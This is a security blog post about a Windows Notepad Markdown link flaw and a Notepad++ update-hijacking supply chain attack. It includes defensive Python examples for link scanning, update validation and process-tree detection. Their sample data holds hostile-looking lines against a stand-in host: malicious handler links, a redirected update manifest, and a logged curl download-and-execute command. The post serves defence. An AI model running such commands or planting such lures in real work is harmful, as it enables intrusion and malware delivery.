
Malware risks hidden inside your everyday text editors - Notepad

  • 9 hours ago
  • 3 min read

When it comes to cyber threats, most of us immediately watch out for web browsers, software cracks, or sketchy apps downloaded from the internet. Simple text editing tools like Notepad, meanwhile, are almost always assumed to be completely safe.

However, a recent chain of security alerts has flipped this mindset. Both the default Windows Notepad app and the advanced editor Notepad++ have been turned into stepping stones for attackers to breach user systems.

1. Windows Notepad and the remote code execution vulnerability via Markdown

The first issue affects the modern Windows Notepad app (the version distributed through the Microsoft Store). According to discussions on the tech forum Lobsters and analysis by Igor's Lab, the app contains a critical flaw tracked as CVE-2026-20841.

Security vulnerability from Notepad
What is Markdown? It is a lightweight markup language that lets users format text (like making words bold, adding headers, or inserting links) using plain text characters instead of relying on complex toolbars.

The vulnerability lies in how Windows Notepad processes and displays links inside Markdown files (.md). The attack plays out like this:

  • The attacker crafts a Markdown file whose innocent-looking link text hides a malicious link target.

  • When the user opens the file in Notepad and clicks the link, Notepad hands the link target to the operating system without restricting it to ordinary web schemes, so the target can name a local protocol handler rather than a web page.

  • Instead of opening a web page, that handler downloads and runs code from the attacker's server. The only user action involved is a click on a link inside a text file, so none of the caution people reserve for executables and downloads ever comes into play.
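The lure described above is a Markdown link whose target is not an http, https or mailto URL. The scanner below is an added example (not from the article and not Microsoft's code) that pulls every inline link, reference definition and autolink out of a Markdown document and flags targets whose URI scheme is outside a small allow-list, decoding percent-encoding and stripping whitespace first so obfuscated schemes do not slip through. The sample document and the scheme names in it are constructed placeholders, not the scheme used in the real exploit.

```python
"""Scan Markdown text for links whose target is not a plain web or mail URL.

Added example, not from the article and not Microsoft's code. It demonstrates
the class of input behind the Notepad bug: a Markdown link whose target uses a
non-http URI scheme that a viewer may hand to a local protocol handler. The
sample document and the scheme names in it are constructed placeholders; they
are not the scheme used in the real exploit.
"""
import re
from urllib.parse import unquote

# Schemes a Markdown viewer is expected to open in a browser or mail client.
SAFE_SCHEMES = {"http", "https", "mailto"}

# Inline links and images: [text](target "optional title"), also the <target> form.
INLINE_LINK = re.compile(r"!?\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+\"[^\"]*\")?\s*\)")
# Reference definitions at line start: [label]: target
REF_DEF = re.compile(r"^\s{0,3}\[([^\]]+)\]:\s*<?(\S+?)>?\s*$", re.MULTILINE)
# Autolinks: <scheme:rest>
AUTOLINK = re.compile(r"<([a-zA-Z][a-zA-Z0-9+.-]*:[^\s>]*)>")


def scheme_of(target: str) -> str:
    """Return the lower-cased URI scheme of a link target, or '' if it has none.

    The target is percent-decoded and stripped of whitespace and control
    characters first, so 'ht%74p:' or 'java<TAB>script:' cannot dodge the
    allow-list. A Windows drive letter ('C:') also counts as a scheme here,
    which is deliberate: a local path as a link target deserves a look too.
    """
    cleaned = "".join(ch for ch in unquote(target) if ch.isprintable() and not ch.isspace())
    m = re.match(r"([a-zA-Z][a-zA-Z0-9+.-]*):", cleaned)
    return m.group(1).lower() if m else ""


def find_suspicious_links(markdown: str) -> list:
    """Return one record per link whose scheme is outside SAFE_SCHEMES."""
    findings = []

    def record(kind: str, text: str, target: str) -> None:
        scheme = scheme_of(target)
        if scheme and scheme not in SAFE_SCHEMES:
            findings.append({
                "kind": kind,
                "text": text,
                "target": target,
                "scheme": scheme,
                # Link text that looks like a web address while the target is
                # something else is the classic lure.
                "text_looks_like_web": text.lower().startswith(("http://", "https://", "www.")),
            })

    for m in INLINE_LINK.finditer(markdown):
        record("inline", m.group(1), m.group(2))
    for m in REF_DEF.finditer(markdown):
        record("reference", m.group(1), m.group(2))
    # Strip inline links first so a <target> inside one is not counted twice.
    for m in AUTOLINK.finditer(INLINE_LINK.sub("", markdown)):
        record("autolink", m.group(1), m.group(1))
    return findings


# Constructed sample document for the demo (not a real exploit file).
SAMPLE_MD = """# Quarterly report

See the [dashboard](https://intranet.example.com/dash) or mail [ops](mailto:ops@example.com).

Download the [PDF version](https://files.example.com/report.pdf "signed copy").

[Open attachment](<myapp://fetch?src=http://attacker.example/payload>)

[https://portal.example.com](demo-handler://run?cmd=x)

Autolink: <app-proto:query=foo>

[spec]: ht%74p://ok.example.com/spec
[tool]: custom-handler:install?from=http://attacker.example/x
"""

if __name__ == "__main__":
    for f in find_suspicious_links(SAMPLE_MD):
        lure = " (text looks like a web link)" if f["text_looks_like_web"] else ""
        print(f"{f['kind']:9} scheme={f['scheme']:15} {f['text']!r} -> {f['target']}{lure}")
```

Run against the sample it reports four links (the percent-encoded http reference is decoded and passes), and singles out the one whose visible text reads like a web address while its target is a custom handler. In practice you would point it at .md files landing in a mail quarantine or a shared drive; it does not tell you whether a given scheme is dangerous on a given machine, only that the target is not a plain web link and deserves a look before anyone clicks it.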

2. The sophisticated supply chain attack targeting Notepad++

Unlike Windows Notepad, Notepad++, an advanced editor popular among programmers and IT professionals, was hit using an entirely different playbook: a supply chain attack.

According to a deep-dive analysis by the cyber security firm Orca Security, attackers belonging to the group Lotus Blossom did not modify the software's source code at all. Instead, they hijacked the server infrastructure that distributes the application's updates.

When a user clicks the familiar "Check for updates" feature, the application sends a request to the update server. Here the attackers set up a selective redirection mechanism:

  • The attack is not random or widespread. The malicious redirect is served only to requests coming from selected IP addresses, while everyone else receives the genuine update.

  • High-value targets (including several organizations and tech businesses in Vietnam, Australia, El Salvador, and the Philippines) are redirected to a spoofed server controlled by the attackers.

  • From there, users unknowingly download an update package laced with malware called Chrysalis. Once installed, it runs silently in the background as a backdoor through which the attackers spy on, steal data from, and control the victim's machine.
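The weak point in the sequence above is that the client trusts whatever download location the update server's answer names. The code below is an added example, not Notepad++'s own updater, that models that exchange: it parses a small XML manifest of the kind an update check returns, applies policy to it (HTTPS only, an allow-listed download host, no downgrade, a package digest pinned in the manifest), then checks the downloaded bytes against that digest. The element names, the trusted host, the current version and the SHA256 field are assumptions for the demo; the legitimate manifest, its redirected twin and the "package" bytes are constructed. These checks are a defence-in-depth subset and do not replace the signed-manifest validation that the fixed release added.

```python
"""Policy checks on an update-check response and the package it points to.

Added example, not Notepad++'s own updater code. It models the step the
article describes: the client asks the update server whether a new version
exists, receives an XML answer, and downloads the installer the answer names.
The element names, the trusted download host, the current version and the
SHA256 field are assumptions for this demo. The checks here (HTTPS only,
allow-listed host, no downgrade, package digest pinned in the manifest) are a
defence-in-depth subset; they do not replace the signed-manifest validation
that the 8.9.1 release added.
"""
import hashlib
import hmac
import xml.etree.ElementTree as ET   # prefer defusedxml for untrusted input in production
from urllib.parse import urlsplit

TRUSTED_DOWNLOAD_HOSTS = {"downloads.example.org"}   # assumption
CURRENT_VERSION = (8, 8, 1)                           # assumption


class UpdateRejected(Exception):
    """Raised when the manifest or package fails a policy check."""


def parse_version(text: str) -> tuple:
    try:
        return tuple(int(p) for p in text.strip().split("."))
    except ValueError:
        raise UpdateRejected(f"malformed version string: {text!r}")


def validate_manifest(xml_text: str) -> dict:
    """Parse the manifest and reject anything that does not pass policy."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        raise UpdateRejected(f"manifest is not well-formed XML: {exc}")
    fields = {child.tag: (child.text or "").strip() for child in root}
    if fields.get("NeedToBeUpdated", "").lower() != "yes":
        return {"update": False}
    version = parse_version(fields.get("Version", ""))
    if version <= CURRENT_VERSION:            # also blocks downgrade attacks
        raise UpdateRejected(f"offered version {version} is not newer than {CURRENT_VERSION}")
    url = urlsplit(fields.get("Location", ""))
    if url.scheme != "https":
        raise UpdateRejected(f"download location is not https: {url.geturl()}")
    if url.hostname not in TRUSTED_DOWNLOAD_HOSTS:
        raise UpdateRejected(f"download host {url.hostname!r} is not in the allow-list")
    digest = fields.get("SHA256", "").lower()
    if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        raise UpdateRejected("manifest carries no usable SHA-256 for the package")
    return {"update": True, "version": version, "location": url.geturl(), "sha256": digest}


def verify_package(package: bytes, expected_sha256: str) -> bool:
    """Compare the downloaded bytes against the digest the manifest advertised."""
    return hmac.compare_digest(hashlib.sha256(package).hexdigest(), expected_sha256)


def decide(xml_text: str, package: bytes) -> str:
    """Return 'install', 'up-to-date', or 'rejected: <reason>'."""
    try:
        manifest = validate_manifest(xml_text)
    except UpdateRejected as exc:
        return f"rejected: {exc}"
    if not manifest["update"]:
        return "up-to-date"
    if not verify_package(package, manifest["sha256"]):
        return "rejected: package digest does not match manifest"
    return "install"


# Constructed sample data for the demo; the "package" is a stand-in blob.
GOOD_PACKAGE = b"stand-in installer bytes for 8.9.1"
GOOD_DIGEST = hashlib.sha256(GOOD_PACKAGE).hexdigest()
LEGIT_MANIFEST = f"""<GUP>
  <NeedToBeUpdated>yes</NeedToBeUpdated>
  <Version>8.9.1</Version>
  <Location>https://downloads.example.org/npp.8.9.1.Installer.exe</Location>
  <SHA256>{GOOD_DIGEST}</SHA256>
</GUP>"""
# The same answer as rewritten by an attacker sitting on the update path: only
# the download location changes, which is all the IP-filtered redirect needs.
REDIRECTED_MANIFEST = LEGIT_MANIFEST.replace(
    "https://downloads.example.org/", "https://updates.attacker.example/")

if __name__ == "__main__":
    print("legit manifest:     ", decide(LEGIT_MANIFEST, GOOD_PACKAGE))
    print("redirected manifest:", decide(REDIRECTED_MANIFEST, GOOD_PACKAGE))
    print("swapped package:    ", decide(LEGIT_MANIFEST, b"trojanised bytes"))
```

The host allow-list defeats the redirect in the article, and the pinned digest defeats a swapped package behind a legitimate-looking location; neither helps if the attacker can rewrite the manifest and the digest together, which is exactly why the manifest itself needs a signature the client verifies before it reads anything else.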

3. Comparison of the two new security threats in Notepad

To give you a clear, bird's-eye view of these two incidents, here is a summary table:

Criteria          | Windows Notepad Flaw                                   | Notepad++ Attack
------------------+--------------------------------------------------------+-----------------------------------------------------
Identifier        | CVE-2026-20841                                         | CVE-2025-15556
Nature of threat  | Markdown link-handling bug: clicking a crafted link    | Supply chain attack: the update path is hijacked
                  | inside the file triggers malware                       | to plant malware
Approach          | Preys on the relaxed mindset of users opening text     | Exploits the automated "Check for updates"
                  | files received via e-mail, Telegram, etc.              | feature that users trust without question
Affected targets  | Windows users who open crafted text files              | Highly selective: specific organizations and
                  |                                                        | individuals (confirmed targets in Vietnam)

4. Practical solutions to protect your system from hidden risks

Fortunately, both Microsoft and the Notepad++ development team addressed these issues quickly and released security patches. To close off the exploitation risk, take these steps now:

  • Update Windows Notepad: open the Microsoft Store, check your Library, and update Notepad to the latest version (version 11.2510 or later contains the fix).

  • Upgrade Notepad++: manually download and install version 8.9.1 or higher. This version validates the certificate on the update XML, so a spoofed update response is rejected. Fetch the installer from the project's official site rather than relying on the in-app updater, since the update path is exactly what was hijacked.

  • Ditch the "safe file" mindset: drop the assumption that text files are automatically harmless. Any format, whether .txt, .md, .jpg, or .pdf, can be weaponized if the software rendering it has an unpatched bug.

  • Enterprise recommendations: deploy endpoint protection that monitors process behaviour, tighten policies against opening files from unverified sources, and watch closely for unexpected processes spawning right after a user interacts with a text editor.
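The last recommendation can be turned into a concrete rule. The script below is an added example (not the article's tooling and not tied to any EDR product) that runs over Sysmon-style process-creation events exported as one JSON object per line and flags children of Windows Notepad or Notepad++ that an editor has no business starting: script hosts and living-off-the-land binaries, and anything launched from outside the system directories. The field names, the benign-child list and the sample events are assumptions constructed for the demo; tune them to your own telemetry.

```python
"""Flag child processes spawned by text editors (added example).

Not the article's own tooling and not tied to any particular EDR product. It
runs a simple rule over constructed Sysmon-style process-creation events
(event id 1) exported as one JSON object per line, and flags children of
Windows Notepad and Notepad++ that an editor has no business starting. The
field names, the benign-child list and the sample events are assumptions for
this demo; tune them to your own telemetry.
"""
import json
from pathlib import PureWindowsPath
from typing import Optional

EDITORS = {"notepad.exe", "notepad++.exe"}
# Script hosts and living-off-the-land binaries an editor should never launch.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "curl.exe", "bitsadmin.exe", "msiexec.exe",
}
# Children an editor legitimately spawns, e.g. opening an http link (assumption).
BENIGN_CHILDREN = {"msedge.exe", "chrome.exe", "firefox.exe", "explorer.exe"}
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> Optional[str]:
    """Return a severity label for a suspicious editor child, else None."""
    if event.get("event_id") != 1:
        return None
    if basename(event.get("parent_image", "")) not in EDITORS:
        return None
    image = event.get("image", "")
    child = basename(image)
    if child in INTERPRETERS:
        return "high: editor spawned a script host or LOLBin"
    if not image.lower().startswith(SYSTEM_DIRS):
        return "high: editor spawned a binary outside system directories"
    if child in BENIGN_CHILDREN:
        return None
    return "medium: editor spawned an unexpected child"


def scan(lines) -> list:
    """Run classify() over JSON lines; lines that are not valid JSON are skipped."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        severity = classify(event)
        if severity:
            hits.append({
                "time": event.get("time"),
                "severity": severity,
                "parent": basename(event["parent_image"]),
                "child": basename(event["image"]),
                "command_line": event.get("command_line", ""),
            })
    return hits


# Constructed sample events (not real telemetry). Backslashes are doubled
# because the lines are JSON.
SAMPLE_EVENTS = r"""
{"time": "2026-02-11T09:14:02Z", "event_id": 1, "image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "parent_image": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_placeholder\\Notepad\\Notepad.exe", "command_line": "msedge.exe https://intranet.example.com/dash", "user": "CORP\\alice"}
{"time": "2026-02-11T09:14:40Z", "event_id": 1, "image": "C:\\Windows\\System32\\cmd.exe", "parent_image": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_placeholder\\Notepad\\Notepad.exe", "command_line": "cmd.exe /c curl -o %TEMP%\\s.exe http://attacker.example/s.exe && %TEMP%\\s.exe", "user": "CORP\\alice"}
{"time": "2026-02-11T10:02:13Z", "event_id": 1, "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\npp.8.9.0.Installer.exe", "parent_image": "C:\\Program Files\\Notepad++\\notepad++.exe", "command_line": "npp.8.9.0.Installer.exe /S", "user": "CORP\\bob"}
{"time": "2026-02-11T10:05:00Z", "event_id": 3, "image": "C:\\Program Files\\Notepad++\\notepad++.exe", "parent_image": "", "user": "CORP\\bob"}
{"time": "2026-02-11T10:07:45Z", "event_id": 1, "image": "C:\\Windows\\System32\\notepad.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "notepad.exe C:\\Users\\bob\\Desktop\\notes.md", "user": "CORP\\bob"}
{"time": "2026-02-11T10:08:10Z", "event_id": 1, "image": "C:\\Windows\\System32\\calc.exe", "parent_image": "C:\\Windows\\System32\\notepad.exe", "command_line": "calc.exe", "user": "CORP\\bob"}
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['time']}  {hit['severity']:55} {hit['parent']} -> {hit['child']}  {hit['command_line']}")
```

On the sample it stays quiet for the browser launched to follow an http link and for Explorer starting Notepad, and raises the cmd.exe download chain, the installer run from a user's Temp directory and the unexpected system binary. The parent-child relation is what ties the alert to "a user interacted with a text editor"; add the editor's own network connections if your telemetry has them, since an updater or a protocol handler fetching from an unfamiliar host is the other half of both stories on this page.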

These two security incidents are textbook examples of a rising cybercrime trend: leveraging the most basic, unsuspected everyday apps to crack a user's defensive armor. Keeping your software updated and maintaining a healthy dose of skepticism toward every file you receive are the ultimate keys to keeping your data safe.

IPSIP VIETNAM ONE MEMBER LIMITED LIABILITY COMPANY (IPSIP VIETNAM OMLLC)